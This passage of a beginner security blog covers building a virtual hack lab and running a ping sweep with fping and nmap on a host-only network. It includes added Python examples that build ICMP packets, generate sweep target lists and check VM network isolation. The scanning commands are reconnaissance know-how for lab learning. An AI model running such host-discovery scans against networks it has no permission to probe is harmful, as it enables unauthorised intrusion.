<span style="font-family: "trebuchet ms" , sans-serif;">Let’s do this! :) <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Fire up your <a href="https://www.kali.org/" target="_blank">Kali</a>, Windows 7 and XP (if you got one). Make
sure they are all on VMNet1 (Host Only) network. </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Go to your attacker machine, open up the terminal and type: ifconfig</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://1.bp.blogspot.com/-gNXNoHKt5xU/V-jfOOd_GeI/AAAAAAAACl4/1kMFWJmSxo4hz_-ZNs5_HLtAF1lCP3mOwCLcB/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="https://1.bp.blogspot.com/-gNXNoHKt5xU/V-jfOOd_GeI/AAAAAAAACl4/1kMFWJmSxo4hz_-ZNs5_HLtAF1lCP3mOwCLcB/s400/2.PNG" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">You should see your IP address start with 192.168.x.x. Mine
is 192.168.221.133. With the net-mask of 255.255.255.0, it means I am on the 192.168.221.0/24
network giving me the privilege to talk to any other hosts on my network
directly. <o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="font-family: "trebuchet ms" , sans-serif;">Since this series is not meant for experts, we will not go
through the rest of the information that is displayed. We cover it all in-depth
with our advanced hacking course. More info on this at the bottom of the page.</span></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">A ping sweep is a fundamental
system scanning tactic to discover live hosts on the network.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">How does it work?</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="margin-left: .25in;">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;">It uses the <a href="https://technet.microsoft.com/en-us/library/cc940069.aspx" target="_blank">ICMP protocol</a>. Send ICMP Echo requests
to hosts. If host is alive, you will receive an ICMP Echo response else you
will not receive anything.</span></span></div>
<div class="MsoNormal">
<span style="font-size: 11pt; line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Ping sweep using <a href="http://fping.org/" target="_blank">Fping</a></span></h3>
</div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Type the following in the terminal:
fping -g 192.168.221.0/24 </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Replace my network address with
yours. You should know yours by now. What this command does with the “-g” flag
is it tells fping to generate a target list on the given subnet. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-3Pn7bCpGj3Y/V-jfOBOfQUI/AAAAAAAACl8/oz0-m2gHvPw3fgL64sGnSFkjRXzcKmalgCEw/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" height="212" src="https://2.bp.blogspot.com/-3Pn7bCpGj3Y/V-jfOBOfQUI/AAAAAAAACl8/oz0-m2gHvPw3fgL64sGnSFkjRXzcKmalgCEw/s400/3.PNG" width="400" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">You should now be able to discover
your Windows 7 and/or XP machines on the virtual lab. As you can see above, 3
hosts are found alive. 1 is my attacker machine and the remaining 2 are the
victim machines. </span></div>
<div class="MsoNormal" style="margin-left: .25in;">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<h3>
<br /><span style="line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;">Ping sweep using <a href="https://nmap.org/" target="_blank">Nmap</a></span></span></h3>
</div>
<div class="MsoNormal">
<span style="line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Nmap is a popular network scanning
tool. It holds more functionality over Fping.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Type the following in the terminal:
nmap -sP -PI 192.168.221.0/24</span></div>
<div class="MsoNormal" style="margin-left: .25in;">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<br />
<span style="line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;">
Make sure to replace my network address with
yours. What this command does with the "-sP" flag is it tells nmap to run a ping scan and with the "-PI" to run ICMP scan.</span></span><br />
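<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">The ICMP Echo exchange, fping's "-g" target-list generation and nmap's ICMP ping scan described above all rest on the same small packet. The following is an added example and not the article's or either tool's code: it builds an ICMP Echo Request with the RFC 1071 checksum, verifies a reply, matches a reply to its request by identifier and sequence number the way a sweeper does, and expands a CIDR block into the host list a sweep would probe. Everything stays in memory; nothing is sent, and the addresses are constructed from the RFC 5737 test range.</span></div>

```python
"""Build and check ICMP Echo packets, and generate a ping-sweep target list.

Added example; not fping's, nmap's or the article's code. Packets are built
and parsed in memory only; nothing is sent. Addresses come from the RFC 5737
test range.
"""
import ipaddress
import struct

ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY = 8, 0
ICMP_HDR = struct.Struct("!BBHHH")  # type, code, checksum, identifier, sequence


def inet_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words (the ICMP checksum)."""
    if len(data) % 2:
        data += b"\x00"  # odd length: pad with a zero byte for the sum only
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type, ident, seq, payload=b""):
    """Return an ICMP Echo Request/Reply with a correct checksum."""
    hdr = ICMP_HDR.pack(icmp_type, 0, 0, ident, seq)
    csum = inet_checksum(hdr + payload)
    return ICMP_HDR.pack(icmp_type, 0, csum, ident, seq) + payload


def parse_echo(packet):
    """Return (type, ident, seq, payload), or None if the checksum is wrong."""
    if len(packet) < ICMP_HDR.size or inet_checksum(packet) != 0:
        return None  # a valid packet sums to zero once the checksum is included
    t, _code, _csum, ident, seq = ICMP_HDR.unpack_from(packet, 0)
    return (t, ident, seq, packet[ICMP_HDR.size:])


def sweep_targets(subnet):
    """What `fping -g` does: expand a CIDR block into the host addresses to probe."""
    return [str(ip) for ip in ipaddress.ip_network(subnet).hosts()]


def matching_reply(request, reply):
    """Does `reply` answer `request`? Sweepers match identifier and sequence."""
    req, rep = parse_echo(request), parse_echo(reply)
    return (req is not None and rep is not None
            and req[0] == ICMP_ECHO_REQUEST and rep[0] == ICMP_ECHO_REPLY
            and req[1:] == rep[1:])


if __name__ == "__main__":
    targets = sweep_targets("192.0.2.0/28")
    print(len(targets), "targets:", targets[0], "...", targets[-1])
    req = build_echo(ICMP_ECHO_REQUEST, ident=0x1234, seq=1, payload=b"sweep")
    rep = build_echo(ICMP_ECHO_REPLY, ident=0x1234, seq=1, payload=b"sweep")
    print("reply matches request:", matching_reply(req, rep))
    # One flipped bit in transit and the checksum no longer verifies.
    corrupted = bytes([rep[0], rep[1] ^ 0x01]) + rep[2:]
    print("corrupted reply parses as:", parse_echo(corrupted))
```

<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">A host that is up but has ICMP Echo filtered produces exactly the same silence as an empty address, which is why the ARP-based sweep in the next article exists. Note also that newer Nmap releases document these options as -sn (host discovery only) and -PE (ICMP Echo); -sP is still accepted as an alias of -sn.</span></div>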
<div>
<span style="font-size: 14.6667px;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Wz9I717toDc/V-j6wQmtdAI/AAAAAAAACmk/Y9K62gA1zmgpf_Fa4aWd09g8Ou9WTDaMgCLcB/s1600/11.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://3.bp.blogspot.com/-Wz9I717toDc/V-j6wQmtdAI/AAAAAAAACmk/Y9K62gA1zmgpf_Fa4aWd09g8Ou9WTDaMgCLcB/s400/11.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Fping discovered 3 hosts are also discovered with Nmap. However there are 2 more extra "hosts" that are discovered with nmap, 192.168.221.1 and 192.168.221.254. Can you guess what they are? Tell us in the comments below. </span><br />
<div>
<div class="MsoNormal">
<span style="line-height: 107%;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">That’s it for now. Take your time to play around with fping
and nmap and see what else you can do with it. We will continue with further
network scanning on the next article. One step at a time.</span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">I mentioned about an advanced hacking course earlier. We at
Bitcrack are offering a course that is 110% hands on and technical. For
example, from what we demonstrated today we go in-depth into what other information of “ifconfig”
command and mastering fping and nmap. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">For info on this, send us a tweet <a href="https://twitter.com/bitcrack_cyber" target="_blank">@bitcrack_cyber</a>. </span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<o:p><i><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></i></o:p></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>-Jayesh Kerai (<a href="https://twitter.com/secjay" target="_blank">@secjay</a>)</i></span></div>
</div>
</div>
<h2>Building Your Own Hack Lab</h2>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><i>Jayesh, 2016-09-23 (updated 2016-10-12)</i></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Getting started in the intricate world of Security & Hacking? </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">A virtual hack lab is an environment of operating systems
that security professionals use to test out new attack techniques, create
exploits, debug, reverse engineer, developing malware, and all the cyber
security related stuff.</span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">You can host a virtual hack lab using just 1 computer.
The only downside being you need to have at least a moderate level of specs in
the hosting computer. <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">Virtual hack labs can contain hundreds of ‘virtual
machines’ (VMs) but these require high resources that off-the-shelf personal
computers don’t have. So in our virtual hack lab we will start with only 2
virtual machines, which is more than enough to test out and apply basic
concepts. <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">What you will need:</span></div>
<div class="MsoNoSpacing">
</div>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Host Machine with a minimum of 6GB of RAM and 80GB of available hard disk space.</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Virtualization Software: VMware Workstation
Player</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Virtual Attack Machine: Kali Linux</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Virtual Victim Machine: Windows XP and Windows 7</span></li>
</ul>
<div class="MsoNoSpacing">
<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Setting up the attack machine:</span></h3>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
</div>
<span style="font-family: "trebuchet ms" , sans-serif;">1. Install VMware Workstation for Free from <a href="https://my.vmware.com/web/vmware/downloads" style="text-indent: -0.25in;" target="_blank">here</a><br />2. Download <b style="text-indent: -0.25in;">Kali Linux 32 bit VM PAE</b><span style="text-indent: -0.25in;"> from </span><a href="https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/" style="text-indent: -0.25in;" target="_blank">here</a><br />3. Unzip the downloaded virtual machine<br />4. Start your VMware and go to File > Open<br />5. Using the Open dialog box, go to the folder where
you unzipped the virtual machine. It should look like this on VMware:</span><br />
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-DgLYZQN-LYs/V-UZIoAa4MI/AAAAAAAAClI/YqifTdrfABoqKxics-u5qdGa3uocC0HWACK4B/s1600/41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" height="282" src="https://4.bp.blogspot.com/-DgLYZQN-LYs/V-UZIoAa4MI/AAAAAAAAClI/YqifTdrfABoqKxics-u5qdGa3uocC0HWACK4B/s400/41.png" width="400" /></span></a></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">6. Select the “Kali-Linux-2016.1-vm-i686” file and
select Open.</span><br />
<span style="text-indent: -0.25in;"><span style="font-family: "trebuchet ms" , sans-serif;">7. Now you should see a window similar to this:</span></span><br />
<span style="text-indent: -0.25in;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-8CSu5e2VTJ8/V-Uaa_IQeHI/AAAAAAAAClM/XpA6JGj2mQ8Pocz_nPkqqPuMJB2BLPDsgCLcB/s1600/42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" height="210" src="https://1.bp.blogspot.com/-8CSu5e2VTJ8/V-Uaa_IQeHI/AAAAAAAAClM/XpA6JGj2mQ8Pocz_nPkqqPuMJB2BLPDsgCLcB/s400/42.png" width="400" /></span></a></div>
<span style="text-indent: -0.25in;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
<span style="text-indent: -0.25in;"><span style="font-family: "trebuchet ms" , sans-serif;">Let’s first take a quick look at the important settings
displayed.</span></span><br />
<br />
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Memory:
This is the amount of RAM that you will give to the VM. The more the better;
however, you should make sure to leave at least 2GB for the host computer (your
computer). The remaining RAM can be divided between your attack
and victim machines.</span></li>
</ul>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Hard
disk: This is the amount of space you will give to the VM. A preset of 30GB
will do just fine for now. If you are running low on your total HDD space, you
can reduce this to 20GB.</span></li>
</ul>
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">Network
Adapter: <b>THIS IS IMPORTANT.</b> A “NAT” setting on the adapter means that the VM shares
the internet connection of your host computer, meaning it can talk over the internet.
You should only choose NAT when updating the machine or downloading new tools. Otherwise you
should change this to Custom: Specific Virtual Network: VMnet1 (Host Only).
This will ensure that your attack machine cannot talk to the internet and you don’t
mistakenly attack a live machine over the internet.</span></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-wnvhWvDW4OY/V-Ua0xiJTYI/AAAAAAAAClQ/0xmFtbtHcBERsUwrXluHBGpHAxp9X_hxgCLcB/s1600/43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" height="360" src="https://3.bp.blogspot.com/-wnvhWvDW4OY/V-Ua0xiJTYI/AAAAAAAAClQ/0xmFtbtHcBERsUwrXluHBGpHAxp9X_hxgCLcB/s400/43.png" width="400" /></span></a></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
</div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">For now, leave it at NAT. Because you will be updating
the machine in later stages.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">8. Power on the virtual machine and you will see
the following window.</span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-vJhmnzZ87aI/V-UblEN_1NI/AAAAAAAAClc/11Si3SezTgEooUGQBxJDbhfLHQgNj4CvACLcB/s1600/44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="372" src="https://3.bp.blogspot.com/-vJhmnzZ87aI/V-UblEN_1NI/AAAAAAAAClc/11Si3SezTgEooUGQBxJDbhfLHQgNj4CvACLcB/s400/44.png" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<!--[if gte vml 1]><v:shape
id="Picture_x0020_4" o:spid="_x0000_i1028" type="#_x0000_t75" style='width:468pt;
height:386.25pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:/Users/Jayesh/AppData/Local/Temp/msohtmlclip1/01/clip_image007.png"
o:title="" croptop="7439f"/>
</v:shape><![endif]--><!--[if !vml]--><span style="font-family: "trebuchet ms" , sans-serif;"><!--[endif]--><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">9. Leave the highlighted entry at “*Kali GNU/Linux” and
press enter.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span>
<br />
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">10. You will now see a grey screen with a username
input box.</span></div>
</div>
<div class="MsoNoSpacing">
<!--[if gte vml 1]><v:shape
id="Picture_x0020_5" o:spid="_x0000_i1027" type="#_x0000_t75" style='width:348.75pt;
height:137.25pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:/Users/Jayesh/AppData/Local/Temp/msohtmlclip1/01/clip_image009.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><span style="font-family: "trebuchet ms" , sans-serif;"><!--[endif]--><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-PFaBy9FvY4c/V-UbzqYv0FI/AAAAAAAAClg/Xa_UzEsz5vIpEdlYHWUynIedDwYqZ_sEgCLcB/s1600/45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="https://3.bp.blogspot.com/-PFaBy9FvY4c/V-UbzqYv0FI/AAAAAAAAClg/Xa_UzEsz5vIpEdlYHWUynIedDwYqZ_sEgCLcB/s320/45.png" width="320" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><b>CHALLENGE</b>: Find out the username and password to login to
the attack machine. <o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;">One of the key traits of a hacker is research and an eye
to detail. <o:p></o:p></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="font-family: "trebuchet ms" , sans-serif;"><i><b>HINT</b>: The credentials are already somewhere in this
article.</i></span><br />
<br />
<br />
<div style="text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><b>Welcome to your attack machine!</b></span></div>
</div>
<div class="MsoNoSpacing" style="margin-left: .25in;">
<!--[if gte vml 1]><v:shape
id="Picture_x0020_6" o:spid="_x0000_i1026" type="#_x0000_t75" style='width:468pt;
height:367.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:/Users/Jayesh/AppData/Local/Temp/msohtmlclip1/01/clip_image010.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><span style="font-family: "trebuchet ms" , sans-serif;"><!--[endif]--><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-oHZ8AQsi5Ps/V-UcD9gC4vI/AAAAAAAAClk/GVPh4zqCdG099TfGN8k7WRKtcLRxOWAagCLcB/s1600/46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="https://4.bp.blogspot.com/-oHZ8AQsi5Ps/V-UcD9gC4vI/AAAAAAAAClk/GVPh4zqCdG099TfGN8k7WRKtcLRxOWAagCLcB/s400/46.png" width="400" /></a></div>
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">11. We will not do a tour of the machine yet. Open up the Terminal by clicking on the black
box with an “$_” sign on the right panel.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">12. And type in the following command from the
picture below.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-xR4jR9LEAVg/V-UcW0k3tjI/AAAAAAAAClo/qvCNUgyf26s-dNz8mzpfdJyJjGV_4mhPACLcB/s1600/47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://2.bp.blogspot.com/-xR4jR9LEAVg/V-UcW0k3tjI/AAAAAAAAClo/qvCNUgyf26s-dNz8mzpfdJyJjGV_4mhPACLcB/s400/47.png" width="400" /></a></div>
<div class="" style="clear: both; text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; text-align: left;"><br /></span></div>
<div class="" style="clear: both; text-align: center;">
<span style="font-family: "trebuchet ms" , sans-serif; text-align: left;">This command will update and upgrade your attack machine so
that you have the latest versions of tools and exploits.</span></div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1779517350579881355" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><span style="font-family: "trebuchet ms" , sans-serif;">It is going to take a while. So minimize the main VMware
window and let’s get our victim machines installed. <o:p></o:p></span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "trebuchet ms" , sans-serif;">Quick Steps to installing windows 7 and windows XP.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span>
<br />
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">1. D</span><span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">ownload the IE8 on Win 7 machine for the VMware Platform from </span><a href="https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/" style="font-family: "Trebuchet MS", sans-serif; text-indent: -0.25in;" target="_blank">here</a><span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">.</span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">2. As for the Win XP machine, Microsoft has ended distribution of test machines. (You can still find lots of XP machines on the internet; I'll leave that to you.)</span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">3. Extract them both into separate folders and open
them up with your VMware.</span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;"><br /></span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif; text-indent: -0.25in;">4. Allocate 1GB of RAM and change the network
adapter to Custom VMNet1 (Host Only) for both machines, with HDD space
of at least 30GB for Windows 7 and 15GB for Windows XP.</span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif;">That’s it.</span></div>
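Before powering on a victim VM it is worth confirming that step 4 actually landed in the machine's .vmx file, because a bridged or NAT adapter would expose the vulnerable Windows machine to your real network. The script below is an added example, not the author's: it parses the key = "value" lines of a .vmx file, checks the standard VMware keys memsize, ethernetN.present, ethernetN.connectionType and ethernetN.vnet against the 1GB / Custom VMnet1 settings above, and runs over two constructed sample fragments (it assumes a missing connectionType means bridged, VMware's default).

```python
import re

# Settings the steps above ask for: 1 GB of RAM and the adapter on custom VMnet1 (host-only).
REQUIRED_MEMORY_MB = 1024
REQUIRED_VNET = "VMnet1"

# A .vmx file is a flat list of   key = "value"   lines; keys are case-insensitive.
VMX_LINE = re.compile(r'^\s*([\w.:]+)\s*=\s*"(.*)"\s*$')

def parse_vmx(text: str) -> dict:
    """Parse .vmx text into a dict with lower-cased keys; comments and blanks are skipped."""
    settings = {}
    for line in text.splitlines():
        m = VMX_LINE.match(line)
        if m and not line.lstrip().startswith("#"):
            settings[m.group(1).lower()] = m.group(2)
    return settings

def check_isolation(settings: dict) -> list:
    """Return a list of findings; an empty list means the VM matches the lab setup."""
    findings = []
    mem = int(settings.get("memsize") or 0)
    if mem < REQUIRED_MEMORY_MB:
        findings.append(f"memsize is {mem} MB, expected at least {REQUIRED_MEMORY_MB} MB")
    for key, val in settings.items():
        m = re.fullmatch(r"ethernet(\d+)\.present", key)
        if not m or val.upper() != "TRUE":
            continue  # only adapters that are actually enabled matter
        n = m.group(1)
        # Assumption: an adapter without a connectionType key behaves as bridged (VMware's
        # default), so it is reported too; bridged or nat puts the victim on your real network.
        ctype = settings.get(f"ethernet{n}.connectiontype", "bridged").lower()
        vnet = settings.get(f"ethernet{n}.vnet", "")
        if ctype != "custom" or vnet.lower() != REQUIRED_VNET.lower():
            findings.append(f"ethernet{n}: connectionType={ctype!r} vnet={vnet!r}, expected custom/{REQUIRED_VNET}")
    return findings

# Constructed sample .vmx fragments (not files from the blog): before and after step 4.
BAD_VMX = """\
memsize = "512"
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
"""

GOOD_VMX = """\
memsize = "1024"
ethernet0.present = "TRUE"
ethernet0.connectionType = "custom"
ethernet0.vnet = "VMnet1"
"""

if __name__ == "__main__":
    for name, text in (("before", BAD_VMX), ("after", GOOD_VMX)):
        print(name, check_isolation(parse_vmx(text)) or "OK: 1 GB RAM, isolated on VMnet1")
```

Run it against the real .vmx of each victim machine (the file sits next to the .vmdk in the folder you extracted in step 3) and fix any finding before powering the VM on.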
<div style="text-indent: 0px;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div style="text-indent: 0px;">
